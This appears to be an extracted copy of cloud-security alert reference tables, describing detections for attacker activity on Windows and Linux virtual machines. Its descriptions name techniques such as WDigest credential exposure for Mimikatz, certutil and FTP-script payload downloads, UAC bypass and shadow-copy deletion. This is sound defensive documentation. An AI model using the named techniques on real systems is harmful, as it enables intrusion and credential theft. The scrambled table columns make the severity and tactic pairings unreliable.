tactics 
(Learn 
more) 


Severity 


High 


Medium 


Informational 


Medium 


Medium 


Alert (alert type) 


Antimalware broad files exclusion in your virtual 
machine 
(VM_AmBroadFilesExclusion) 


Antimalware disabled and code execution in your 
virtual machine 
(VM_AmDisablementAndCodeExecution) 


Antimalware disabled in your virtual machine 
(VM_AmDisablement) 


Antimalware file exclusion and code execution in 
your virtual machine 
(VM_AmFileExclusionAndCodeExecution) 


Antimalware file exclusion and code execution in 
your virtual machine 
(VM_AmTempFileExclusionAndCodeExecution) 


Antimalware file exclusion in your virtual machine 
(VM_AmTempFileExclusion) 


Antimalware real-time protection was disabled in 
your virtual machine 
(VM_AmRealtimeProtectionDisabled) 


Description 


Files exclusion from antimalware extension with broad 
exclusion rule was detected in your virtual machine by 
analyzing the Azure Resource Manager operations in 
your subscription. Such exclusion practically disabling 
the Antimalware protection. 

Attackers might exclude files from the antimalware 
scan on your virtual machine to prevent detection 
while running arbitrary code or infecting the machine 
with malware. 


Antimalware disabled at the same time as code 
execution on your virtual machine. This was detected 
by analyzing Azure Resource Manager operations in 
your subscription. 

Attackers disable antimalware scanners to prevent 
detection while running unauthorized tools or 
infecting the machine with malware. 


Antimalware disabled in your virtual machine. This was 
detected by analyzing Azure Resource Manager 
operations in your subscription. 

Attackers might disable the antimalware on your 
virtual machine to prevent detection. 


File excluded from your antimalware scanner at the 
same time as code was executed via a custom script 
extension on your virtual machine. This was detected 
by analyzing Azure Resource Manager operations in 
your subscription. 

Attackers might exclude files from the antimalware 
scan on your virtual machine to prevent detection 
while running unauthorized tools or infecting the 
machine with malware. 


Temporary file exclusion from antimalware extension 
in parallel to execution of code via custom script 
extension was detected in your virtual machine by 
analyzing the Azure Resource Manager operations in 
your subscription. 

Attackers might exclude files from the antimalware 
scan on your virtual machine to prevent detection 
while running arbitrary code or infecting the machine 
with malware. 


File excluded from your antimalware scanner on your 
virtual machine. This was detected by analyzing Azure 
Resource Manager operations in your subscription. 
Attackers might exclude files from the antimalware 
scan on your virtual machine to prevent detection 
while running unauthorized tools or infecting the 
machine with malware. 


Real-time protection disablement of the antimalware 
extension was detected in your virtual machine by 
analyzing the Azure Resource Manager operations in 
your subscription. 

Attackers might disable real-time protection from the 
antimalware scan on your virtual machine to avoid 
detection while running arbitrary code or infecting the 
machine with malware. 


MITRE 
tactics 
(Learn 
more) 


Defense 
Evasion 


Defense 
Evasion, 
Execution 


Defense 
Evasion, 
Execution 


Defense 
Evasion 


Defense 
Evasion 


Severity 


Medium 


High 


Medium 


High 


High 


Medium 


Medium 


Alert (alert type) 


Antimalware real-time protection was disabled 
temporarily in your virtual machine 
(VM_AmTempRealtimeProtectionDisablement) 


Antimalware real-time protection was disabled 
temporarily while code was executed in your virtual 
machine 
(VM_AmRealtimeProtectionDisablementAndCodeExec) 


Antimalware scans blocked for files potentially 
related to malware campaigns on your virtual 
machine (Preview) 
(VM_AmMalwareCampaignRelatedExclusion) 


Antimalware temporarily disabled in your virtual 
machine 
(VM_AmTemporarilyDisablement) 


Antimalware unusual file exclusion in your virtual 
machine 
(VM_UnusualAmFileExclusion) 


Communication with suspicious domain identified 
by threat intelligence 
(AzureDNS ThreatIntelSuspectDomain) 


Custom script extension with suspicious command in 
your virtual machine 
(VM_CustomScriptExtensionSuspiciousCmd) 


Description 


Real-time protection temporary disablement of the 
antimalware extension was detected in your virtual 
machine by analyzing the Azure Resource Manager 
operations in your subscription. 

Attackers might disable real-time protection from the 
antimalware scan on your virtual machine to avoid 
detection while running arbitrary code or infecting the 
machine with malware. 


Real-time protection temporary disablement of the 
antimalware extension in parallel to code execution via 
custom script extension was detected in your virtual 
machine by analyzing the Azure Resource Manager 
operations in your subscription. 

Attackers might disable real-time protection from the 
antimalware scan on your virtual machine to avoid 
detection while running arbitrary code or infecting the 
machine with malware. 


An exclusion rule was detected in your virtual machine 
to prevent your antimalware extension scanning 
certain files that are suspected of being related to a 
malware campaign. The rule was detected by 
analyzing the Azure Resource Manager operations in 
your subscription. Attackers might exclude files from 
antimalware scans to prevent detection while running 
arbitrary code or infecting the machine with malware. 


Antimalware temporarily disabled in your virtual 
machine. This was detected by analyzing Azure 
Resource Manager operations in your subscription. 
Attackers might disable the antimalware on your 
virtual machine to prevent detection. 


Unusual file exclusion from antimalware extension was 
detected in your virtual machine by analyzing the 
Azure Resource Manager operations in your 
subscription. 

Attackers might exclude files from the antimalware 
scan on your virtual machine to prevent detection 
while running arbitrary code or infecting the machine 
with malware. 


Communication with suspicious domain was detected 
by analyzing DNS transactions from your resource and 
comparing against known malicious domains 
identified by threat intelligence feeds. Communication 
to malicious domains is frequently performed by 
attackers and could imply that your resource is 
compromised. 


Custom script extension with suspicious command 
was detected in your virtual machine by analyzing the 
Azure Resource Manager operations in your 
subscription. 

Attackers may use custom script extension to execute 
a malicious code on your virtual machine via the Azure 
Resource Manager. 


MITRE 
tactics 


Severity 


(Learn 
more) 


Defense Medium 


Evasion 


- High 


Defense Medium 


Evasion 


- Medium 


Defense Medium 


Evasion 


Initial Medium 
Access, 
Persistence, 
Execution, 
Command 
And 
Control, 


Exploitation 


Execution Medium 


Alert (alert type) 


Custom script extension with suspicious entry-point 
in your virtual machine 
(VM_CustomScriptExtensionSuspiciousEntryPoint) 


Custom script extension with suspicious payload in 
your virtual machine 
(VM_CustomScriptExtensionSuspiciousPayload) 


Detected actions indicative of disabling and deleting 
IIS log files 


Detected anomalous mix of upper and lower case 
characters in command-line 


Detected change to a registry key that can be 
abused to bypass UAC 


Detected decoding of an executable using built-in 
certutil.exe tool 


Detected enabling of the WDigest 
UseLogonCredential registry key 


Description MITRE 
tactics 
(Learn 
more) 

Custom script extension with a suspicious entry-point Execution 

was detected in your virtual machine by analyzing the 

Azure Resource Manager operations in your 

subscription. The entry-point refers to a suspicious 

GitHub repository. 

Attackers may use custom script extensions to execute 

malicious code on your virtual machines via the Azure 

Resource Manager. 

Custom script extension with a payload from a Execution 


suspicious GitHub repository was detected in your 
virtual machine by analyzing the Azure Resource 
Manager operations in your subscription. 

Attackers may use custom script extensions to execute 
malicious code on your virtual machines via the Azure 
Resource Manager. 


Analysis of host data detected actions that show IIS - 
log files being disabled and/or deleted. 


Analysis of host data on %{Compromised Host} - 
detected a command line with anomalous mix of 

upper and lower case characters. This kind of pattern, 

while possibly benign, is also typical of attackers trying 

to hide from case-sensitive or hash-based rule 

matching when performing administrative tasks on a 
compromised host. 


Analysis of host data on %{Compromised Host} - 
detected that a registry key that can be abused to 

bypass UAC (User Account Control) was changed. This 

kind of configuration, while possibly benign, is also 

typical of attacker activity when trying to move from 
unprivileged (standard user) to privileged (for example 
administrator) access on a compromised host. 


Analysis of host data on %{Compromised Host} - 
detected that certutil.exe, a built-in administrator 

utility, was being used to decode an executable 

instead of its mainstream purpose that relates to 

manipulating certificates and certificate data. Attackers 

are known to abuse functionality of legitimate 

administrator tools to perform malicious actions, for 

example using a tool such as certutil.exe to decode a 

malicious executable that will then be subsequently 

executed. 


Analysis of host data detected a change in the registry - 
key HKLM\SYSTEM\ 
CurrentControlSet\Control\SecurityProviders\WDigest\ 
"UseLogonCredential". Specifically this key has been 

updated to allow logon credentials to be stored in 

clear text in LSA memory. Once enabled, an attacker 

can dump clear text passwords from LSA memory with 
credential harvesting tools such as Mimikatz. 


Severity 


Medium 


Medium 


Medium 


Medium 


Medium 


High 


Medium 


Alert (alert type) 


Detected encoded executable in command line data 


Detected obfuscated command line 


Detected Petya ransomware indicators 


Detected possible execution of keygen executable 


Detected possible execution of malware dropper 


Detected possible local reconnaissance activity 


Detected potentially suspicious use of Telegram tool 


Detected suppression of legal notice displayed to 
users at logon 


Description 


Analysis of host data on %{Compromised Host} 
detected a base-64 encoded executable. This has 
previously been associated with attackers attempting 
to construct executables on-the-fly through a 
sequence of commands, and attempting to evade 
intrusion detection systems by ensuring that no 
individual command would trigger an alert. This could 
be legitimate activity, or an indication of a 
compromised host. 


Attackers use increasingly complex obfuscation 
techniques to evade detections that run against the 
underlying data. Analysis of host data on % 
{Compromised Host} detected suspicious indicators of 
obfuscation on the commandline. 


Analysis of host data on %{Compromised Host} 
detected indicators associated with Petya ransomware. 
See https://aka.ms/petya-blog @ for more 
information. Review the command line associated in 
this alert and escalate this alert to your security team. 


Analysis of host data on %{Compromised Host} 
detected execution of a process whose name is 
indicative of a keygen tool; such tools are typically 
used to defeat software licensing mechanisms but 
their download is often bundled with other malicious 
software. Activity group GOLD has been known to 
make use of such keygens to covertly gain back door 
access to hosts that they compromise. 


Analysis of host data on %{Compromised Host} 
detected a filename that has previously been 
associated with one of activity group GOLD's methods 
of installing malware on a victim host. 


Analysis of host data on %{Compromised Host} 
detected a combination of systeminfo commands that 
has previously been associated with one of activity 
group GOLD's methods of performing reconnaissance 
activity. While ‘systeminfo.exe' is a legitimate Windows 
tool, executing it twice in succession in the way that 
has occurred here is rare. 


Analysis of host data shows installation of Telegram, a 
free cloud-based instant messaging service that exists 
both for mobile and desktop system. Attackers are 
known to abuse this service to transfer malicious 
binaries to any other computer, phone, or tablet. 


Analysis of host data on %{Compromised Host} 
detected changes to the registry key that controls 
whether a legal notice is displayed to users when they 
log on. Microsoft security analysis has determined that 
this is a common activity undertaken by attackers after 
having compromised a host. 


MITRE 
tactics 
(Learn 
more) 


Severity 


High 


Informational 


High 


Medium 


High 


Medium 


Low 


Alert (alert type) 


Detected suspicious combination of HTA and 
PowerShell 


Detected suspicious commandline arguments 


Detected suspicious commandline used to start all 
executables in a directory 


Detected suspicious credentials in commandline 


Detected suspicious document credentials 


Detected suspicious execution of VBScript.Encode 
command 


Detected suspicious execution via rundll32.exe 


Detected suspicious file cleanup commands 


Description 


mshta.exe (Microsoft HTML Application Host) which is 
a signed Microsoft binary is being used by the 
attackers to launch malicious PowerShell commands. 
Attackers often resort to having an HTA file with inline 
VBScript. When a victim browses to the HTA file and 
chooses to run it, the PowerShell commands and 
scripts that it contains are executed. Analysis of host 
data on %{Compromised Host} detected mshta.exe 
launching PowerShell commands. 


Analysis of host data on %{Compromised Host} 
detected suspicious commandline arguments that 
have been used in conjunction with a reverse shell 
used by activity group HYDROGEN. 


Analysis of host data has detected a suspicious 
process running on %{Compromised Host}. The 
commandline indicates an attempt to start all 
executables (*.exe) that may reside in a directory. This 
could be an indication of a compromised host. 


Analysis of host data on %{Compromised Host} 
detected a suspicious password being used to execute 
a file by activity group BORON. This activity group has 
been known to use this password to execute Pirpi 
malware on a victim host. 


Analysis of host data on %{Compromised Host} 
detected a suspicious, common precomputed 
password hash used by malware being used to 
execute a file. Activity group HYDROGEN has been 
known to use this password to execute malware on a 


victim host. 


Analysis of host data on %{Compromised Host} 
detected the execution of VBScript.Encode command. 
This encodes the scripts into unreadable text, making 
it more difficult for users to examine the code. 
Microsoft threat research shows that attackers often 
use encoded VBscript files as part of their attack to 
evade detection systems. This could be legitimate 
activity, or an indication of a compromised host. 


Analysis of host data on %{Compromised Host} 
detected rundll32.exe being used to execute a process 
with an uncommon name, consistent with the process 
naming scheme previously seen used by activity group 
GOLD when installing their first stage implant on a 
compromised host. 


Analysis of host data on %{Compromised Host} 
detected a combination of systeminfo commands that 
has previously been associated with one of activity 
group GOLD's methods of performing post- 
compromise self-cleanup activity. While 
‘systeminfo.exe' is a legitimate Windows tool, 
executing it twice in succession, followed by a delete 
command in the way that has occurred here is rare. 


MITRE 
tactics 
(Learn 
more) 


Severity 


Medium 


High 


Medium 


High 


High 


Medium 


High 


High 


Alert (alert type) 


Detected suspicious file creation 


Detected suspicious named pipe communications 


Detected suspicious network activity 


Detected suspicious new firewall rule 


Detected suspicious use of Cacls to lower the 
security state of the system 


Detected suspicious use of FTP -s Switch 


Description 


Analysis of host data on %{Compromised Host} 
detected creation or execution of a process that has 
previously indicated post-compromise action taken on 
a victim host by activity group BARIUM. This activity 
group has been known to use this technique to 
download more malware to a compromised host after 
an attachment in a phishing doc has been opened. 


Analysis of host data on %{Compromised Host} 
detected data being written to a local named pipe 
from a Windows console command. Named pipes are 
known to be a channel used by attackers to task and 
communicate with a malicious implant. This could be 
legitimate activity, or an indication of a compromised 
host. 


Analysis of network traffic from %{Compromised Host} 
detected suspicious network activity. Such traffic, while 
possibly benign, is typically used by an attacker to 
communicate with malicious servers for downloading 
of tools, command-and-control and exfiltration of 
data. Typical related attacker activity includes copying 
remote administration tools to a compromised host 
and exfiltrating user data from it. 


Analysis of host data detected a new firewall rule has 
been added via netsh.exe to allow traffic from an 
executable in a suspicious location. 


Attackers use myriad ways like brute force, spear 
phishing etc. to achieve initial compromise and get a 
foothold on the network. Once initial compromise is 
achieved they often take steps to lower the security 
settings of a system. Cacls—short for change access 
control list is Microsoft Windows native command-line 
utility often used for modifying the security permission 
on folders and files. A lot of time the binary is used by 
the attackers to lower the security settings of a system. 
This is done by giving Everyone full access to some of 
the system binaries like ftp.exe, net.exe, wscript.exe 
etc. Analysis of host data on %{Compromised Host} 
detected suspicious use of Cacls to lower the security 
of a system. 


Analysis of process creation data from the % 
{Compromised Host} detected the use of the FTP "- 
s:filename" switch. This switch is used to specify an FTP 
script file for the client to run. Malware or malicious 
processes are known to use this FTP switch (- 
s:filename) to point to a script file, which is configured 
to connect to a remote FTP server and download more 
malicious binaries. 


MITRE 
tactics 
(Learn 
more) 


Severity 


High 


High 


Low 


Medium 


Medium 


Medium 


Alert (alert type) 


Detected suspicious use of Pcalua.exe to launch 
executable code 


Detected the disabling of critical services 


Digital currency mining related behavior detected 


Dynamic PS script construction 


Executable found running from a suspicious location 


Fileless attack behavior detected 
(VM_FilelessAttackBehavior.Windows) 


Description 


Analysis of host data on %{Compromised Host} 
detected the use of pcalua.exe to launch executable 
code. Pcalua.exe is component of the Microsoft 
Windows "Program Compatibility Assistant", which 
detects compatibility issues during the installation or 
execution of a program. Attackers are known to abuse 
functionality of legitimate Windows system tools to 
perform malicious actions, for example using 
pcalua.exe with the -a switch to launch malicious 
executables either locally or from remote shares. 


The analysis of host data on %{Compromised Host} 
detected execution of "net.exe stop" command being 
used to stop critical services like SharedAccess or the 
Windows Security app. The stopping of either of these 
services can be indication of a malicious behavior. 


Analysis of host data on %{Compromised Host} 
detected the execution of a process or command 
normally associated with digital currency mining. 


Analysis of host data on %{Compromised Host} 
detected a PowerShell script being constructed 
dynamically. Attackers sometimes use this approach of 
progressively building up a script in order to evade 
IDS systems. This could be legitimate activity, or an 
indication that one of your machines has been 
compromised. 


Analysis of host data detected an executable file on % 
{Compromised Host} that is running from a location in 
common with known suspicious files. This executable 
could either be legitimate activity, or an indication of a 
compromised host. 


The memory of the process specified contains 
behaviors commonly used by fileless attacks. Specific 
behaviors include: 

1) Shellcode, which is a small piece of code typically 
used as the payload in the exploitation of a software 
vulnerability. 

2) Active network connections. See 
NetworkConnections below for details. 

3) Function calls to security sensitive operating system 
interfaces. See Capabilities below for referenced OS 
capabilities. 

4) Contains a thread that was started in a dynamically 
allocated code segment. This is a common pattern for 
process injection attacks. 


MITRE 
tactics 
(Learn 
more) 


Defense 
Evasion 


Severity 


Medium 


Medium 


High 


Medium 


High 


Low 


Alert (alert type) 


Fileless attack technique detected 
(VM_FilelessAttackTechnique.Windows) 


Fileless attack toolkit detected 
(VM _FilelessAttackToolkit.Windows) 


High risk software detected 


Local Administrators group members were 
enumerated 


Malicious firewall rule created by ZINC server 
implant [seen multiple times] 


Description 


The memory of the process specified below contains 
evidence of a fileless attack technique. Fileless attacks 
are used by attackers to execute code while evading 
detection by security software. Specific behaviors 
include: 

1) Shellcode, which is a small piece of code typically 
used as the payload in the exploitation of a software 
vulnerability. 

2) Executable image injected into the process, such as 
in a code injection attack. 

3) Active network connections. See 
NetworkConnections below for details. 

4) Function calls to security sensitive operating system 
interfaces. See Capabilities below for referenced OS 
capabilities. 

5) Process hollowing, which is a technique used by 
malware in which a legitimate process is loaded on the 
system to act as a container for hostile code. 

6) Contains a thread that was started in a dynamically 
allocated code segment. This is a common pattern for 
process injection attacks. 


The memory of the process specified contains a 
fileless attack toolkit: [toolkit name]. Fileless attack 
toolkits use techniques that minimize or eliminate 
traces of malware on disk, and greatly reduce the 
chances of detection by disk-based malware scanning 
solutions. Specific behaviors include: 

1) Well-known toolkits and crypto mining software. 
2) Shellcode, which is a small piece of code typically 
used as the payload in the exploitation of a software 
vulnerability. 

3) Injected malicious executable in process memory. 


Analysis of host data from %{Compromised Host} 
detected the usage of software that has been 
associated with the installation of malware in the past. 
A common technique utilized in the distribution of 
malicious software is to package it within otherwise 
benign tools such as the one seen in this alert. When 
you use these tools, the malware can be silently 
installed in the background. 


Machine logs indicate a successful enumeration on 
group %{Enumerated Group Domain Name}% 
{Enumerated Group Name}. Specifically, % 
{Enumerating User Domain Name}%{Enumerating User 
Name} remotely enumerated the members of the % 
{Enumerated Group Domain Name}%{Enumerated 
Group Name} group. This activity could either be 
legitimate activity, or an indication that a machine in 
your organization has been compromised and used to 
reconnaissance %{vmname}. 


A firewall rule was created using techniques that 
match a known actor, ZINC. The rule was possibly 
used to open a port on %{Compromised Host} to 
allow for Command & Control communications. This 
behavior was seen [x] times today on the following 
machines: [Machine names] 


MITRE 
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Defense 
Evasion, 
Execution 


Defense 
Evasion, 
Execution 


Severity 


High 


Medium 


Medium 


Informational 


High 


Alert (alert type) Description MITRE Severity 
tactics 
(Learn 
more) 


Malicious SQL activity Machine logs indicate that '%{process name}' was - High 
executed by account: %{user name}. This activity is 
considered malicious. 


Multiple Domain Accounts Queried Analysis of host data has determined that an unusual - Medium 
number of distinct domain accounts are being queried 
within a short time period from %{Compromised 
Host}. This kind of activity could be legitimate, but can 
also be an indication of compromise. 


Possible credential dumping detected [seen multiple Analysis of host data has detected use of native - Medium 
times] windows tool (for example, sqidumper.exe) being used 

in a way that allows to extract credentials from 

memory. Attackers often use these techniques to 

extract credentials that they then further use for lateral 

movement and privilege escalation. This behavior was 

seen [x] times today on the following machines: 

[Machine names] 


Potential attempt to bypass AppLocker detected Analysis of host data on %{Compromised Host} - High 
detected a potential attempt to bypass AppLocker 
restrictions. AppLocker can be configured to 
implement a policy that limits what executables are 
allowed to run on a Windows system. The command- 
line pattern similar to that identified in this alert has 
been previously associated with attacker attempts to 
circumvent AppLocker policy by using trusted 
executables (allowed by AppLocker policy) to execute 
untrusted code. This could be legitimate activity, or an 
indication of a compromised host. 


PsExec execution detected Analysis of host data indicates that the process % Lateral Informational 
(VM_RunByPsExec) {Process Name} was executed by PsExec utility. PsExec Movement, 

can be used for running processes remotely. This Execution 

technique might be used for malicious purposes. 


Ransomware indicators detected [seen multiple Analysis of host data indicates suspicious activity - High 
times] traditionally associated with lock-screen and 

encryption ransomware. Lock screen ransomware 

displays a full-screen message preventing interactive 

use of the host and access to its files. Encryption 

ransomware prevents access by encrypting data files. 

In both cases a ransom message is typically displayed, 

requesting payment in order to restore file access. This 

behavior was seen [x] times today on the following 

machines: [Machine names] 


Ransomware indicators detected Analysis of host data indicates suspicious activity - High 
traditionally associated with lock-screen and 
encryption ransomware. Lock screen ransomware 
displays a full-screen message preventing interactive 
use of the host and access to its files. Encryption 
ransomware prevents access by encrypting data files. 
In both cases a ransom message is typically displayed, 
requesting payment in order to restore file access. 


Rare SVCHOST service group executed The system process SVCHOST was observed running a Defense Informational 
(VM_SvcHostRunInRareServiceGroup) rare service group. Malware often uses SVCHOST to Evasion, 
masquerade its malicious activity. Execution 


Alert (alert type) 


Sticky keys attack detected 


Successful brute force attack 
(VM_LoginBruteForceSuccess) 


Suspect integrity level indicative of RDP hijacking 


Suspect service installation 


Suspected Kerberos Golden Ticket attack parameters 
observed 


Suspicious Account Creation Detected 


Suspicious Activity Detected 
(VM_SuspiciousActivity) 


Suspicious authentication activity 
(VM_LoginBruteForceValidUserFailed) 


MITRE 
tactics 


Description 


(Learn 
more) 


Analysis of host data indicates that an attacker may be - 
subverting an accessibility binary (for example sticky 

keys, onscreen keyboard, narrator) in order to provide 
backdoor access to the host %{Compromised Host}. 


Several sign in attempts were detected from the same Exploitation 
source. Some successfully authenticated to the host. 

This resembles a burst attack, in which an attacker 

performs numerous authentication attempts to find 


valid account credentials. 


Analysis of host data has detected the tscon.exe - 
running with SYSTEM privileges - this can be indicative 

of an attacker abusing this binary in order to switch 

context to any other logged on user on this host; it's a 

known attacker technique to compromise more user 

accounts and move laterally across a network. 


Analysis of host data has detected the installation of - 
tscon.exe as a service: this binary being started as a 

service potentially allows an attacker to trivially switch 

to any other logged on user on this host by hijacking 

RDP connections; it's a known attacker technique to 
compromise more user accounts and move laterally 

across a network. 


Analysis of host data detected commandline - 
parameters consistent with a Kerberos Golden Ticket 
attack. 


Analysis of host data on %{Compromised Host} - 
detected creation or use of a local account % 

{Suspicious account name} : this account name closely 
resembles a standard Windows account or group 

name '%{Similar To Account Name}'. This is potentially 

a rogue account created by an attacker, so named in 

order to avoid being noticed by a human 

administrator. 


Analysis of host data has detected a sequence of one Execution 
or more processes running on %{machine name} that 

have historically been associated with malicious 

activity. While individual commands may appear 

benign the alert is scored based on an aggregation of 

these commands. This could either be legitimate 


activity, or an indication of a compromised host. 


Although none of them succeeded, some of them Probing 
used accounts were recognized by the host. This 

resembles a dictionary attack, in which an attacker 

performs numerous authentication attempts using a 

dictionary of predefined account names and 

passwords in order to find valid credentials to access 

the host. This indicates that some of your host account 

names might exist in a well-known account name 

dictionary. 


Severity 


Medium 


Medium/High 


Medium 


Medium 


Medium 


Medium 


Medium 


Medium 


Alert (alert type) 


Suspicious code segment detected 


Suspicious double extension file executed 


Suspicious download using Certutil detected [seen 
multiple times] 


Suspicious download using Certutil detected 


Suspicious failed execution of custom script 
extension in your virtual machine 
(VM_CustomScriptExtensionSuspiciousFailure) 


Suspicious PowerShell Activity Detected 


Suspicious PowerShell cmdlets executed 


Suspicious process executed [seen multiple times] 


Description 


Indicates that a code segment has been allocated by 
using non-standard methods, such as reflective 
injection and process hollowing. The alert provides 
more characteristics of the code segment that have 
been processed to provide context for the capabilities 
and behaviors of the reported code segment. 


Analysis of host data indicates an execution of a 
process with a suspicious double extension. This 
extension may trick users into thinking files are safe to 
be opened and might indicate the presence of 
malware on the system. 


Analysis of host data on %{Compromised Host} 
detected the use of certutil.exe, a built-in 
administrator utility, for the download of a binary 
instead of its mainstream purpose that relates to 
manipulating certificates and certificate data. Attackers 
are known to abuse functionality of legitimate 
administrator tools to perform malicious actions, for 
example using certutil.exe to download and decode a 
malicious executable that will then be subsequently 
executed. This behavior was seen [x] times today on 
the following machines: [Machine names] 


Analysis of host data on %{Compromised Host} 
detected the use of certutil.exe, a built-in 
administrator utility, for the download of a binary 
instead of its mainstream purpose that relates to 
manipulating certificates and certificate data. Attackers 
are known to abuse functionality of legitimate 
administrator tools to perform malicious actions, for 
example using certutil.exe to download and decode a 
malicious executable that will then be subsequently 
executed. 


Suspicious failure of a custom script extension was 
detected in your virtual machine by analyzing the 

Azure Resource Manager operations in your 
subscription. 
Such failures may be associated with malicious scripts 
run by this extension. 


Analysis of host data detected a PowerShell script 
running on %{Compromised Host} that has features in 


common with known suspicious scripts. This script 
could either be legitimate activity, or an indication of a 
compromised host. 


Analysis of host data indicates execution of known 
malicious PowerShell PowerSploit cmdlets. 


Machine logs indicate that the suspicious process: '% 
{Suspicious Process}' was running on the machine, 
often associated with attacker attempts to access 
credentials. This behavior was seen [x] times today on 
the following machines: [Machine names] 


MITRE 
tactics 
(Learn 
more) 


Execution 


Severity 


Medium 


High 


Medium 


Medium 


Medium 


High 


Medium 


High 


Alert (alert type) 


Suspicious process executed 


Suspicious process name detected [seen multiple 
times] 


Suspicious process name detected 


Suspicious process termination burst 
(VM_TaskkillBurst) 


Suspicious SQL activity 


Suspicious SVCHOST process executed 


Suspicious system process executed 


(VM_SystemProcessInAbnormalContext) 


Suspicious Volume Shadow Copy Activity 


Description 


Machine logs indicate that the suspicious process: '% 
{Suspicious Process}' was running on the machine, 
often associated with attacker attempts to access 
credentials. 


Analysis of host data on %{Compromised Host} 
detected a process whose name is suspicious, for 
example corresponding to a known attacker tool or 
named in a way that is suggestive of attacker tools 
that try to hide in plain sight. This process could be 
legitimate activity, or an indication that one of your 
machines has been compromised. This behavior was 
seen [x] times today on the following machines: 
[Machine names] 


Analysis of host data on %{Compromised Host} 
detected a process whose name is suspicious, for 
example corresponding to a known attacker tool or 
named in a way that is suggestive of attacker tools 
that try to hide in plain sight. This process could be 
legitimate activity, or an indication that one of your 
machines has been compromised. 


Analysis of host data indicates a suspicious process 
termination burst in %{Machine Name}. Specifically, % 
{NumberOfCommands} processes were killed between 
%{Begin} and %{Ending}. 


Machine logs indicate that '%{process name}' was 
executed by account: %{user name}. This activity is 
uncommon with this account. 


The system process SVCHOST was observed running 
in an abnormal context. Malware often uses SYVCHOST 
to masquerade its malicious activity. 


The system process %{process name} was observed 
running in an abnormal context. Malware often uses 
this process name to masquerade its malicious activity. 


Analysis of host data has detected a shadow copy 
deletion activity on the resource. Volume Shadow 
Copy (VSC) is an important artifact that stores data 
snapshots. Some malware and specifically 
Ransomware, targets VSC to sabotage backup 
strategies. 


MITRE 
tactics 
(Learn 
more) 


Defense 
Evasion 


Defense 
Evasion, 
Execution 


Severity 


High 


Medium 


Medium 


Low 


Medium 


High 


High 


High 


Alert (alert type) 


Suspicious WindowPosition registry value detected 


Suspiciously named process detected 


Unusual config reset in your virtual machine 
(VM_VMAccessUnusualConfigReset) 


Unusual deletion of custom script extension in your 
virtual machine 
(VM_CustomScriptExtensionUnusualDeletion) 


Unusual execution of custom script extension in 
your virtual machine 
(VM_CustomScriptExtensionUnusualExecution) 


Unusual process execution detected 


MITRE 
tactics 


Description 


(Learn 
more) 


Analysis of host data on %{Compromised Host} - 
detected an attempted WindowPosition registry 
configuration change that could be indicative of 
hiding application windows in nonvisible sections of 
the desktop. This could be legitimate activity, or an 
indication of a compromised machine: this type of 
activity has been previously associated with known 
adware (or unwanted software) such as 
Win32/OneSystemCare and Win32/SystemHealer and 
malware such as Win32/Creprote. When the 
WindowpPosition value is set to 201329664, (Hex: 
0x0c00 0c00, corresponding to X-axis=0c00 and the Y- 
axis=0c00) this places the console app's window in a 


non-visible section of the user's screen in an area that 
is hidden from view below the visible start 
menu/taskbar. Known suspect Hex value includes, but 
not limited to c000c000 


Analysis of host data on %{Compromised Host} - 
detected a process whose name is very similar to but 

different from a very commonly run process (%{Similar 

To Process Name}). While this process could be benign 
attackers are known to sometimes hide in plain sight 

by naming their malicious tools to resemble legitimate 

process names. 


An unusual config reset was detected in your virtual Credential 


machine by analyzing the Azure Resource Manager Access 
operations in your subscription. 

While this action may be legitimate, attackers can try 
utilizing VM Access extension to reset the 
configuration in your virtual machine and compromise 
it. 

Unusual deletion of a custom script extension was Execution 
detected in your virtual machine by analyzing the 

Azure Resource Manager operations in your 

subscription. 

Attackers may use custom script extensions to execute 

malicious code on your virtual machines via the Azure 

Resource Manager. 


Unusual execution of a custom script extension was Execution 
detected in your virtual machine by analyzing the 

Azure Resource Manager operations in your 

subscription. 

Attackers may use custom script extensions to execute 

malicious code on your virtual machines via the Azure 


Resource Manager. 


Analysis of host data on %{Compromised Host} - 
detected the execution of a process by %{User Name} 

that was unusual. Accounts such as %{User Name} 

tend to perform a limited set of operations, this 

execution was determined to be out of character and 

may be suspicious. 


Severity 


Low 


Medium 


Medium 


Medium 


Medium 


High 


Alert (alert type) 


Unusual user password reset in your virtual machine 
(VM_VMAccessUnusualPasswordReset) 


Unusual user SSH key reset in your virtual machine 
(VM_VMAccessUnusualSSHReset) 


VBScript HTTP object allocation detected 


Alerts for Linux machines 


Description MITRE Severity 


tactics 
(Learn 
more) 
An unusual user password reset was detected in your Credential Medium 
virtual machine by analyzing the Azure Resource Access 
Manager operations in your subscription. 
While this action may be legitimate, attackers can try 
utilizing the VM Access extension to reset the 
credentials of a local user in your virtual machine and 
compromise it. 
An unusual user SSH key reset was detected in your Credential Medium 
virtual machine by analyzing the Azure Resource Access 
Manager operations in your subscription. 
While this action may be legitimate, attackers can try 
utilizing VM Access extension to reset SSH key of a 
user account in your virtual machine and compromise 
it. 
Creation of a VBScript file using Command Prompt has - High 


been detected. The following script contains HTTP 
object allocation command. This action can be used to 
download malicious files. 


Microsoft Defender for Servers Plan 2 provides unique detections and alerts, in addition to the ones provided by 


Microsoft Defender for Endpoint. The alerts provided for Linux machines are: 


Further details and notes 


Alert (alert type) 


a history file has been cleared 


Antimalware broad files exclusion in your virtual 
machine 
(VM_AmBroadFilesExclusion) 


Description MITRE tactics Severity 
(Learn more) 


Analysis of host data indicates that the - Medium 
command history log file has been 

cleared. Attackers may do this to cover 

their traces. The operation was 

performed by user: '%{user name}'. 


Files exclusion from antimalware - Medium 
extension with broad exclusion rule was 
detected in your virtual machine by 
analyzing the Azure Resource Manager 
operations in your subscription. Such 
exclusion practically disabling the 
Antimalware protection. 

Attackers might exclude files from the 
antimalware scan on your virtual machine 
to prevent detection while running 
arbitrary code or infecting the machine 
with malware. 


Alert (alert type) 


Antimalware disabled and code execution in your 
virtual machine 
(VM_AmDisablementAndCodeExecution) 


Antimalware disabled in your virtual machine 
(VM_AmDisablement) 


Antimalware file exclusion and code execution in 
your virtual machine 
(VM_AmFileExclusionAndCodeExecution) 


Antimalware file exclusion and code execution in 
your virtual machine 
(VM_AmTempFileExclusionAndCodeExecution) 


Antimalware file exclusion in your virtual machine 
(VM_AmTempFileExclusion) 


Antimalware real-time protection was disabled in 
your virtual machine 
(VM_AmRealtimeProtectionDisabled) 


Description 


Antimalware disabled at the same time as 
code execution on your virtual machine. 
This was detected by analyzing Azure 
Resource Manager operations in your 
subscription. 

Attackers disable antimalware scanners 
to prevent detection while running 
unauthorized tools or infecting the 
machine with malware. 


Antimalware disabled in your virtual 
machine. This was detected by analyzing 
Azure Resource Manager operations in 
your subscription. 

